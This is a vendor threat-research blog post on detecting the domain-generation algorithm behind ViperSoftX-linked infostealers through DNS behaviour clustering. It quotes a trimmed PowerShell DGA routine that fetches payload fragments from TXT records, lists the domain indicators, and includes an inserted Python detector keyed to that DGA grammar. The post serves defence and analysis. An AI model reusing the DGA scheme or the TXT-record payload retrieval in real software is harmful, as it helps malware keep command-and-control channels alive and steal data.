
AI-Driven DGA Detection Uncovers a Dormant Infostealer

EfficientIP’s AI-Driven DGA detection uncovered systematic domain clusters and dormant infrastructure later tied to an Infostealer, enabling proactive protection, early detection, and efficient response.

October 9, 2025 | Written by: Christophe Girard |


By applying patented AI-Driven DGA Detection with Tuple Clustering, entire clusters of domains related to the ViperSoftX variants were identified by EfficientIP’s DNS Security years before they became active. This uncovered the systematic use of domain generation algorithms to sustain command-and-control operations, providing early visibility into one of today’s most persistent infostealer families. The findings confirm how DNS-centric Threat Intelligence delivers protection where traditional security tools fall short, ensuring organizations can stop cyber threats before they strike.

AI-Driven DGA Detection Reveals Infostealer Before It Struck

In our previous blogs, we detailed how EfficientIP’s DNS Threat Intelligence first detected the EIP-458 Infostealer, exposed its stealth tactics, and later confirmed its correlation to the notorious ViperSoftX malware family. Those findings showed how DNS Security solutions can reveal what traditional defenses miss. But the story goes further: by identifying the domain generation algorithms (DGAs) driving this campaign, EfficientIP researchers uncovered entire clusters of dormant domains long before they became active. This early visibility meant the infostealer could be detected and contained before launching its malicious activity at scale.

What Are DGAs?

A Domain Generation Algorithm (DGA) is a technique attackers use to automatically create large numbers of domain names. Malware relies on these domains to conduct its malicious activity: contact its command-and-control servers, send stolen data, or receive instructions. One of the key uses of DGAs is enabling data exfiltration, where stolen information is quietly transferred out through rotating domains. By frequently switching domains, attackers evade detection and keep their operations alive. From early cyber threats like Conficker to modern ones like Doki, DGAs show how threat actors evolve to bypass defenses. This is why AI-Driven DGA Detection is critical for stopping them before activation.

Most security tools try to spot DGAs by the domain name itself—its characters and structure (odd mixes, uncommon words, statistical “entropy”), sometimes with ML. Attackers now craft names that resemble normal domain names, so this method often misses threats and triggers false alarms.

EfficientIP’s AI-driven DNS security, powered by patented Tuple Clustering threat detection, focuses on behavior—not just domain names. It tracks who is querying which domains and when, bundling these signals into simple “tuples.” Clustering those tuples reveals groups that move together like a DGA family, even if some data is missing. The result is earlier detection of active and dormant DGAs with fewer false positives.

How the Infostealer Used DGAs to Build Resilient Domain Clusters

In researching the infostealer variants covered in our previous blogs, EfficientIP’s researchers found clear signs of domain generation algorithms within DNS Threat Intelligence. One of the most notable patterns was the creation of systematic domain clusters. Instead of relying on a single command-and-control server, threat actors built families of domains following strict prefix, suffix, and TLD rules. Examples include names like slimawriter.com, slimardb.xyz, and slimashlow.com, all sharing the same structured pattern. A closer look revealed that all domains in the Slima cluster began with the prefix slima, followed by descriptors such as db, shlow, tfdsc, virtualb, or writer, and ended with either .com or .xyz. Among them, slimawriter.com stood out, as it was the only registered domain and operated as the active C2 server. Queries to this domain were significantly more frequent than to its peers, which remained dormant or unregistered but available as reserves to be activated if needed.

[Figure: Infostealer Families]

Extending the same AI-Driven DNS security analysis across DNS traffic uncovered additional clusters with different prefixes, including yeild, activato, freed, and quasar.

[Figure: Infostealer TLDs]

Together, these naming rules — five prefixes, five suffixes, and two TLDs — formed a systematic framework capable of producing hundreds of domains. This structure gives threat actors a scalable pool of interchangeable infrastructure, ensuring that when one domain is blocked or seized, others can immediately replace it.


This design illustrates how the campaign achieved resilience through redundancy. By rotating through structured clusters of domains, attackers ensured continuity and persistence, allowing them to operate undisturbed and conduct data exfiltration while making takedown efforts far more complex.

Domain Generation Algorithms Enabled Persistence

What enabled these structured clusters to exist at scale was the use of domain generation algorithms (DGAs). Instead of manually registering domains, the 2025 Zero-Day malware relied on a PowerShell routine that automatically produced hundreds of variations by combining prefixes, suffixes, and TLDs. This automation gave threat actors a renewable infrastructure: when one domain was blocked, new ones could instantly take its place.

A trimmed excerpt of the routine is shown below (non-executable, with some lines intentionally removed for safety):

# Simplified DGA domain generation (trimmed for safety)
$domains  = @("com","xyz")
$prefixes = @("activato","slima","yeild","quasa","freed")
$suffixes = @("rdb","writer","shlow","tfdsc","virtualb")

foreach ($tld in $domains) {
  foreach ($pre in $prefixes) {
    foreach ($suf in $suffixes) {
      $fqdn = "$pre$suf.$tld"
      $res  = Query-DnsUpdates -targetDomain $fqdn   # fetch TXT records
      # Payload processing logic removed for safety
    }
  }
}

This algorithm generated domains such as slimawriter[.]com, freedrdb[.]xyz, or activatoshlow[.]com. The malware then queried their TXT records to retrieve encoded payload fragments. With this method, attackers could rotate in dormant or unregistered domains the moment active ones were blocked, ensuring continuity.

EfficientIP designated this DGA family as EIP-455-EconoMimics. Using its AI-driven DNS Security, based on innovative Tuple Clustering technology, EfficientIP detected the clusters before they became operational. The algorithm worked by analyzing anomalies in DNS behavior and correlating them with graph theory and unsupervised machine learning. Unlike syntax-only methods, AI-Driven DGA Detection exposed both active C2s and dormant domains. This gave defenders predictive visibility into attacker infrastructure.
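To make the structural and behavioral signals described above concrete, here is an added Python example (not EfficientIP's code and not its patented Tuple Clustering, only a simplified stand-in for the idea) that parses constructed resolver log lines, decomposes each queried name into a (prefix, suffix, TLD) tuple using the lists from the trimmed excerpt, groups the tuples by prefix, and separates the resolving member (the likely active C2) from dormant NXDOMAIN members. The log format, client addresses and helper names are assumptions for illustration.

```python
import re
from collections import Counter, defaultdict

# Prefix/suffix/TLD lists exactly as they appear in the excerpt of the malware routine above.
PREFIXES = ("activato", "slima", "yeild", "quasa", "freed")
SUFFIXES = ("rdb", "writer", "shlow", "tfdsc", "virtualb")
TLDS = ("com", "xyz")

# Constructed sample resolver log lines, "<client> <qname> <rcode>"; not real telemetry.
SAMPLE_LOG = """\
10.0.0.5 slimawriter.com NOERROR
10.0.0.5 slimardb.xyz NXDOMAIN
10.0.0.5 slimashlow.com NXDOMAIN
10.0.0.5 slimawriter.com NOERROR
10.0.0.7 slimatfdsc.xyz NXDOMAIN
10.0.0.7 freedrdb.xyz NXDOMAIN
10.0.0.7 activatoshlow.com NXDOMAIN
10.0.0.7 slimawriter.com NOERROR
10.0.0.9 www.example.com NOERROR
10.0.0.9 slimaxyzfoo.com NXDOMAIN
"""

# Grammar of the DGA: <prefix><suffix>.<tld>, anchored so near-misses (slimaxyzfoo.com) do not match.
DGA_RE = re.compile(r"^(%s)(%s)\.(%s)$" % ("|".join(PREFIXES), "|".join(SUFFIXES), "|".join(TLDS)))

def parse_tuple(line):
    """Return (client, prefix, suffix, tld, rcode) when the qname fits the DGA grammar, else None."""
    client, qname, rcode = line.split()
    m = DGA_RE.match(qname.lower().rstrip("."))
    return None if m is None else (client, m.group(1), m.group(2), m.group(3), rcode)

def cluster_report(log_text):
    """Group matching queries by prefix; per cluster give member count, querying clients,
    NXDOMAIN share, the resolving domain (likely active C2) and the dormant members."""
    clusters = defaultdict(lambda: {"clients": set(), "queries": Counter(), "resolved": Counter(), "nx": 0})
    for line in log_text.splitlines():
        t = parse_tuple(line)
        if t is None:
            continue  # benign or non-matching name
        client, pre, suf, tld, rcode = t
        c, fqdn = clusters[pre], f"{pre}{suf}.{tld}"
        c["clients"].add(client)
        c["queries"][fqdn] += 1
        if rcode == "NXDOMAIN":
            c["nx"] += 1  # unregistered reserve domain being probed
        elif rcode == "NOERROR":
            c["resolved"][fqdn] += 1  # registered member actually answering
    report = {}
    for pre, c in clusters.items():
        total = sum(c["queries"].values())
        report[pre] = {"members": len(c["queries"]), "clients": len(c["clients"]),
                       "nxdomain_ratio": c["nx"] / total,
                       "likely_c2": c["resolved"].most_common(1)[0][0] if c["resolved"] else None,
                       "dormant": sorted(d for d in c["queries"] if d not in c["resolved"])}
    return report
```

A cluster with many NXDOMAIN members and one resolving member is the shape the page describes for slima: the resolving member is the C2 to block now, the dormant members are the reserves to block before they are registered.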

The DNS Threat Intelligence graph below shows client activity associated with EIP-455 from May to September 2025. Peaks in predictable DGA client counts reveal when the malware attempted to query generated domains, while sharp drops reflect blocks or inactivity. This timeline illustrates how AI-Driven DNS Security continuously tracks attacker behavior.

[Figure: Infostealer Economics Matches]

The EIP-455-EconoMimics family was then added to EfficientIP’s DNS Threat Intelligence feed, protecting our customers even while the 2025 Zero-Day malware was still dormant. This detection is clearly illustrated in EfficientIP’s DNS Intelligence Center (DNS IC) dashboard. The screenshot below shows systematic clusters such as slima, activato, freed, quasar, and yeild, all tagged under the EIP-455 ID. Most domains still returned NXDOMAIN, highlighting how the DNS Security AI-Driven DGA Detection exposed dormant infrastructure long before it became operational — enabling proactive protection.

[Figure: Infostealer-EIP-455-EconoMimics-Matches]

DGAs give the campaign long-term persistence and make takedown efforts far more difficult, since defenders cannot simply neutralize a handful of domains. By focusing on behavioral DNS signals, EfficientIP’s AI-Driven DGA Detection with Tuple Clustering revealed not only the active C2s but also dormant and unregistered domains. This enabled EfficientIP’s DNS Security solution to identify attacker infrastructure early and protect customers by disrupting campaigns before they became operational.

AI-Driven DGA Detection Also Protected Against the ViperSoftX Variant

In our previous blog, we detailed how EfficientIP’s DNS Threat Intelligence exposed the link between the infostealer variants and the notorious ViperSoftX family. That AI-Driven security analysis confirmed attribution through cryptographic reuse and overlapping infrastructure. But the research also revealed that the ViperSoftX malware is using the PwrSh:CryptoStealer-C DGA. AI-Driven DGA Detection had identified the PwrSh:CryptoStealer-C malicious activity in our DNS Threat Intelligence as far back as June 2022. The first finding came from observing that domains seen in recent infostealer activity were consistent with historical ViperSoftX infrastructure. These domains followed systematic naming rules, combining predictable prefixes such as wmail, fairu, bideo, privatproxy, and ahoravideo with suffixes like endpoint, blog, chat, cdn, and schnellvpn, across both .com and .xyz. The screenshot below shows the threat matches in EfficientIP’s DNS Threat Intelligence dashboard between May and September 2025, where these recurring domain patterns were identified.

[Figure: Infostealer-PwrSh:CryptoStealer-C-Matches]

Tracking back the malicious activity with AI-Driven DNS security revealed an even deeper history. Monitoring command-and-control (C&C) traffic showed that the DGA family has been active since June 2022. This demonstrated that EfficientIP’s AI-Driven DGA Detection had been flagging ViperSoftX-related infrastructure long before the most recent infostealer variants came to light.

[Figure: Infostealer-PwrSh Matches]

Looking further back across the full four-year monitoring window revealed the true scale of the campaign. Thousands of related domains tied to ViperSoftX and its variants were generated during that period, many of which were detected and flagged by EfficientIP’s DNS Security before activation. This long-term visibility confirmed that the operators relied on systematic, large-scale domain generation to maintain persistence and ensure their infrastructure could survive takedowns.

[Figure: Infostealer-PwrSh CryptoStealer-C-CNC]

Recent monitoring of DNS traffic confirms that the PwrSh:CryptoStealer-C DGA family is far from inactive. Between May and September 2025, EfficientIP’s DNS Security solution identified a steady stream of domain-generation activity, clearly visible as a continuous line of threat detections. This demonstrates that ViperSoftX and its variants remain highly active over time.

[Figure: Infostealer-PwrSh Matches]

Key Takeaways

From uncovering stealthy infostealer variants to detecting the long-term domain-generation activity behind ViperSoftX and its variants, this AI-Driven security research shows how attackers are building resilient infrastructures designed to evade takedowns. By leveraging patented AI-Driven DGA Detection with Tuple Clustering, EfficientIP’s 360° DNS Security solution identified these cyber threats years before they became fully active—revealing systematic domain clusters, tracking C&C activity, and confirming the evolution of one of today’s most dangerous infostealer families. This early threat detection ensures organizations remain protected against campaigns that traditional security tools fail to detect.

Strengthen your Network Protection: Check if DGAs are active in Your DNS

Run a free DNS Risk Assessment to see if DGAs are operating in your network — and detect threats like ViperSoftX variants before they become active.